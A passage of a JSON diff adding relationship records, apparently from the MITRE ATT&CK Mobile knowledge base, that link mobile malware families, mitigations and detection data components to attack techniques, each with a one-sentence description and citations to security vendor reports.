+ } + ], + "modified": "2020-09-15T15:18:12.459Z", + "description": "[FakeSpy](https://attack.mitre.org/software/S0509) can collect device information, including OS version and device model.(Citation: Cybereason FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--838f647e-8ff8-48bd-bbd5-613cee7736cb", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--25655385-5b0d-4700-a59f-d5d043625b84", + "created": "2023-02-06T18:50:50.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:13:16.813Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can use rooting exploits to silently give itself permissions or install additional malware.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5ec3fcbb-d2ac-44ba-a2d4-99e7ddacf3a2", + "created": "2023-03-20T18:59:57.364Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + 
"modified": "2023-03-20T18:59:57.364Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--fc53309d-ebd5-4573-9242-57024ebdad4f", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b40e34ad-b699-4196-aa07-5bd71fe8f213", + "created": "2022-04-20T17:31:58.697Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "TrendMicro Coronavirus Updates", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Corona Updates](https://attack.mitre.org/software/S0425) has exfiltrated data using FTP.(Citation: TrendMicro Coronavirus Updates)", + "modified": "2022-04-20T17:31:58.697Z", + "relationship_type": "uses", + "source_ref": "malware--366c800f-97a8-48d5-b0a6-79d00198252a", + "target_ref": "attack-pattern--37047267-3e56-453c-833e-d92b68118120", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--06348e22-9a06-4e4c-a57c-e438462e7fce", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/", + "description": "Nikita Buchka and Alexey Firsh. (2018, January 16). Skygofree: Following in the footsteps of HackingTeam. 
Retrieved September 24, 2018.", + "source_name": "Kaspersky-Skygofree" + } + ], + "modified": "2019-08-09T18:08:07.173Z", + "description": "[Skygofree](https://attack.mitre.org/software/S0327) can record audio via the microphone when an infected device is in a specified location.(Citation: Kaspersky-Skygofree)", + "relationship_type": "uses", + "source_ref": "malware--3a913bac-4fae-4d0e-bca8-cae452f1599b", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--aa8e45c2-4276-451b-b1eb-59c396bf720a", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Gooligan Citation", + "description": "Check Point Research Team. (2016, November 30). More Than 1 Million Google Accounts Breached by Gooligan. 
Retrieved December 12, 2016.", + "url": "http://blog.checkpoint.com/2016/11/30/1-million-google-accounts-breached-gooligan/" + } + ], + "modified": "2019-10-10T15:18:51.154Z", + "description": "[Gooligan](https://attack.mitre.org/software/S0290) executes Android root exploits.(Citation: Gooligan Citation)", + "relationship_type": "uses", + "source_ref": "malware--20d56cd6-8dff-4871-9889-d32d254816de", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--6f9f892e-56ec-480b-aa40-337f20f2bb9c", + "type": "relationship", + "created": "2020-11-10T17:08:35.624Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." 
+ } + ], + "modified": "2020-11-10T17:08:35.624Z", + "description": "[CarbonSteal](https://attack.mitre.org/software/S0529) can dynamically load additional functionality.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--007ebf84-4e14-44c7-a5aa-151d5de85320", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2359ad4b-b00b-4fd5-aef8-2d2be8bcf081", + "created": "2023-01-18T19:19:01.740Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cyble_drinik_1022", + "description": "Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. Retrieved January 18, 2023.", + "url": "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:52:20.587Z", + "description": "[Drinik](https://attack.mitre.org/software/S1054) can use Accessibility Services to disable Google Play Protect.(Citation: cyble_drinik_1022)", + "relationship_type": "uses", + "source_ref": "malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe", + "target_ref": "attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--3f81a680-3151-4608-b83f-550756632013", + "type": "relationship", + "created": "2020-07-20T13:58:53.604Z", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro-XLoader-FakeSpy", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/", + "description": "Hiroaki, H., Wu, L., Wu, L.. (2019, April 2). XLoader Disguises as Android Apps, Has FakeSpy Links. Retrieved July 20, 2020." + } + ], + "modified": "2020-09-24T15:12:24.301Z", + "description": "[XLoader for iOS](https://attack.mitre.org/software/S0490) can obtain the device’s IMEM, ICCID, and MEID.(Citation: TrendMicro-XLoader-FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--29944858-da52-4d3d-b428-f8a6eb8dde6f", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--506d657b-1634-442e-8179-7187f82feb3a", + "created": "2020-12-24T21:55:56.691Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. 
Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:38:17.926Z", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) has accessed the call logs.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d2d7476e-66a4-4d46-877c-6e80678bbb38", + "created": "2022-04-01T18:43:25.764Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "System partition integrity mechanisms, such as Verified Boot, can detect the unauthorized modification of system files.", + "modified": "2022-04-01T18:43:25.764Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7b1cf46f-784b-405a-a8dd-4624c19d8321", + "target_ref": "attack-pattern--20b0931a-8952-42ca-975f-775bad295f1a", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--1577a79c-5f70-41cc-95bd-2407cfd1acbd", + "type": "relationship", + "created": "2020-06-26T15:12:40.094Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "ESET DEFENSOR ID", + "url": 
"https://www.welivesecurity.com/2020/05/22/insidious-android-malware-gives-up-all-malicious-features-but-one-gain-stealth/", + "description": "L. Stefanko. (2020, May 22). Insidious Android malware gives up all malicious features but one to gain stealth. Retrieved June 26, 2020." + } + ], + "modified": "2020-06-26T15:12:40.094Z", + "description": "[DEFENSOR ID](https://attack.mitre.org/software/S0479) can abuse the accessibility service to perform actions on behalf of the user, including launching attacker-specified applications to steal data.(Citation: ESET DEFENSOR ID)", + "relationship_type": "uses", + "source_ref": "malware--5a5dca4c-03c1-4b99-bfcf-c206e20aa663", + "target_ref": "attack-pattern--d1f1337e-aea7-454c-86bd-482a98ffaf62", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--6f30b02b-5d88-453d-af1e-305a75bfaf87", + "type": "relationship", + "created": "2020-06-26T15:12:40.098Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "ESET DEFENSOR ID", + "url": "https://www.welivesecurity.com/2020/05/22/insidious-android-malware-gives-up-all-malicious-features-but-one-gain-stealth/", + "description": "L. Stefanko. (2020, May 22). Insidious Android malware gives up all malicious features but one to gain stealth. Retrieved June 26, 2020." 
+ } + ], + "modified": "2020-06-26T15:12:40.098Z", + "description": "[DEFENSOR ID](https://attack.mitre.org/software/S0479) can retrieve a list of installed applications.(Citation: ESET DEFENSOR ID)", + "relationship_type": "uses", + "source_ref": "malware--5a5dca4c-03c1-4b99-bfcf-c206e20aa663", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f6098dca-3a9e-4991-8d51-1310b12161b6", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Lookout-PegasusAndroid", + "url": "https://blog.lookout.com/blog/2017/04/03/pegasus-android/", + "description": "Mike Murray. (2017, April 3). Pegasus for Android: the other side of the story emerges. Retrieved April 16, 2017." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Pegasus for Android](https://attack.mitre.org/software/S0316) uses SMS for command and control.(Citation: Lookout-PegasusAndroid)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--93799a9d-3537-43d8-b6f4-17215de1657c", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--97408547-bacd-4308-a8be-556e9ff04951", + "created": "2023-03-20T18:55:23.628Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:55:23.628Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--1b51f5bc-b97a-498a-8dbd-bc6b1901bf19", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--4df6a22e-489f-400c-b953-cc53bfb708a3", + "type": "relationship", + "created": "2020-09-14T14:13:45.296Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout eSurv", + "url": "https://blog.lookout.com/esurv-research", + "description": "A. Bauer. (2019, April 8). Lookout discovers phishing sites distributing new iOS and Android surveillanceware. Retrieved September 11, 2020." 
+ } + ], + "modified": "2020-09-14T14:13:45.296Z", + "description": "[eSurv](https://attack.mitre.org/software/S0507)’s iOS version can collect device information.(Citation: Lookout eSurv)", + "relationship_type": "uses", + "source_ref": "malware--680f680c-eef9-4f8a-b5f5-f451bf47e403", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e269e6a2-a709-4aa1-a260-f3f0d0284056", + "type": "relationship", + "created": "2020-12-24T22:04:27.919Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." 
+ } + ], + "modified": "2020-12-24T22:04:27.919Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) has extracted messages from chat programs, such as WeChat.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--352fabc8-48fe-4190-92b3-49b00348bb22", + "created": "2019-03-11T15:13:40.454Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "TrendMicro-Anserver", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/android-malware-uses-blog-posts-as-cc/", + "description": "Karl Dominguez. (2011, October 2). Android Malware Uses Blog Posts as C&C. Retrieved February 6, 2017." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[ANDROIDOS_ANSERVER.A](https://attack.mitre.org/software/S0310) uses encrypted content within a blog site for part of its command and control. 
Specifically, the encrypted content contains URLs for other servers to be used for other aspects of command and control.(Citation: TrendMicro-Anserver)", + "modified": "2022-04-18T19:04:48.388Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--4bf6ba32-4165-42c1-b911-9c36165891c8", + "target_ref": "attack-pattern--986f80f7-ff0e-4f48-87bd-0394814bbce5", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c393fe8f-5708-40eb-ada9-6ca0d9b16c7d", + "created": "2023-03-15T16:34:51.794Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-15T16:34:51.794Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--e2c2249a-eb82-4614-8dd4-9c514dde65e2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--aeeadd6b-30d3-4b4f-ac61-fd0bc367b415", + "created": "2022-03-30T14:50:07.291Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Device attestation could detect unauthorized operating system modifications.", + "modified": "2022-03-30T14:50:07.291Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c", + "target_ref": "attack-pattern--670a4d75-103b-4b14-8a9e-4652fa795edd", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0bbe5936-04bf-4c9a-bb43-cd37f36c3349", + "created": "2020-10-29T19:01:13.826Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Microsoft MalLockerB", + "description": "D. Venkatesan. (2020, October 8). Sophisticated new Android malware marks the latest evolution of mobile ransomware . Retrieved October 29, 2020.", + "url": "https://www.microsoft.com/security/blog/2020/10/08/sophisticated-new-android-malware-marks-the-latest-evolution-of-mobile-ransomware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:44:31.187Z", + "description": "[AndroidOS/MalLocker.B](https://attack.mitre.org/software/S0524) has registered to receive 14 different broadcast intents for automatically triggering malware payloads. (Citation: Microsoft MalLockerB)", + "relationship_type": "uses", + "source_ref": "malware--9b86f8c3-33ab-44cf-a66d-c0fd6070e2ce", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--3a8fea40-69ba-4cfe-b577-c3112a60887a", + "created": "2022-04-01T14:51:51.593Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should be wary of granting applications dangerous or privacy-intrusive permissions, such as access to notifications. 
", + "modified": "2022-04-01T14:51:51.593Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--5a2bff26-f5e5-41f9-b3da-a558988ef3f3", + "type": "relationship", + "created": "2020-06-26T14:55:13.351Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cybereason EventBot", + "url": "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born", + "description": "D. Frank, L. Rochberger, Y. Rimmer, A. Dahan. (2020, April 30). EventBot: A New Mobile Banking Trojan is Born. Retrieved June 26, 2020." + } + ], + "modified": "2020-06-26T14:55:13.351Z", + "description": "[EventBot](https://attack.mitre.org/software/S0478) can collect a list of installed applications.(Citation: Cybereason EventBot)", + "relationship_type": "uses", + "source_ref": "malware--aecc0097-c9f8-4786-9b39-e891ff173f54", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--32958f57-ad9b-4fe1-abf3-6f92df895014", + "type": "relationship", + "created": "2019-08-05T13:22:03.917Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "description": "Blaich, A., et al. 
(2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "source_name": "Lookout Dark Caracal Jan 2018" + } + ], + "modified": "2019-08-09T18:06:11.873Z", + "description": "[Pallas](https://attack.mitre.org/software/S0399) stores domain information and URL paths as hardcoded AES-encrypted, base64-encoded strings.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--19b95b83-bac0-455f-882f-0209abddb76f", + "created": "2022-04-05T20:11:35.619Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Applications that properly encrypt network traffic may evade some forms of AiTM behavior. 
", + "modified": "2022-04-05T20:11:35.619Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--8220b57e-c400-4525-bf69-f8edc6b389a8", + "target_ref": "attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b610c587-576a-40cc-9f76-6362455c8ff4", + "created": "2023-03-20T18:43:01.334Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:43:01.334Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--eb6cf439-1bcb-4d10-bc68-1eed844ed7b3", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--86170d29-0e41-44d0-94b0-de7d23718302", + "created": "2022-04-05T19:42:39.957Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Android 12 Features", + "url": "https://developer.android.com/about/versions/12/features", + "description": "Google. (2022, April 4). Features and APIs Overview. Retrieved April 5, 2022." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "The `HIDE_OVERLAY_WINDOWS` permission was introduced in Android 12 allowing apps to hide overlay windows of type `TYPE_APPLICATION_OVERLAY` drawn by other apps with the `SYSTEM_ALERT_WINDOW` permission, preventing other applications from creating overlay windows on top of the current application.(Citation: Android 12 Features)", + "modified": "2022-04-05T19:51:47.956Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--a8c31121-852b-46bd-9ba4-674ae5afe7ad", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c3c0ff44-71bb-4774-a850-7b7c9dccb619", + "created": "2023-03-20T18:44:04.803Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:44:04.803Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4", + "target_ref": "attack-pattern--789ef15a-34d9-4b32-a779-8cbbc9eb32f5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c1512591-7440-4a69-93b9-fe439a4c197e", + "created": "2022-03-28T19:40:40.860Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-28T19:40:40.860Z", + "relationship_type": "subtechnique-of", + 
